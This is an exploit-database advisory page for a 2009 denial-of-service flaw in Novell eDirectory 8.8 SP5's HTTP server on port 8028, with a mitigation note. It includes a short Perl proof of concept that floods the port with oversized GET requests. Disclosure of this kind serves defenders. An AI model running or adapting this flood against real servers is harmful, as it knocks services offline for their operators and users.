Novell eDirectory 8.8 SP5 Denial of Service Vulnerability

vendor:

eDirectory

by:

karak0rsan, Hellcode Research

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: eDirectory

Affected Version From: 8.8 SP5

Affected Version To: 8.8 SP5

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Novell eDirectory 8.8 SP5 Denial of Service Vulnerability

Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack. If a remote attacker sends Unicode strings with Http Request to '8028 port' ('8028' is the default port of Novell eDirectory Dhost Http Server), the attacker can cause the system to consume %100 of the CPU resources.

Mitigation:

Ensure that the Novell eDirectory 8.8 SP5 is updated to the latest version and that the port 8028 is not exposed to the public internet.

Source

Exploit-DB raw data:

Affected Software:
Novell eDirectory 8.8 SP5

Vulnerability Description:
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.
If a remote attacker sends Unicode strings with Http Request to "8028 port" 
("8028" is the default port of Novell eDirectory Dhost Http Server), 
the attacker can cause the system to consume %100 of the CPU resources.

Discovered by:
karak0rsan, Hellcode Research

Original Advisory: 
http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Exploit:

	- snip-
....

$data = "?" x 500000;

for($i= 0; $i < 1000; $i++)
{
	$sock= new IO::Socket::INET( PeerAddr => "localhost",
	PeerPort => 8028,

	Proto => 'tcp',
	Type => SOCK_STREAM, 

	);
	
	print $sock "GET /$data HTTP/1.0\r\n\r\n";
	
	close($sock);
}

...
	- snip -

# milw0rm.com [2009-09-09]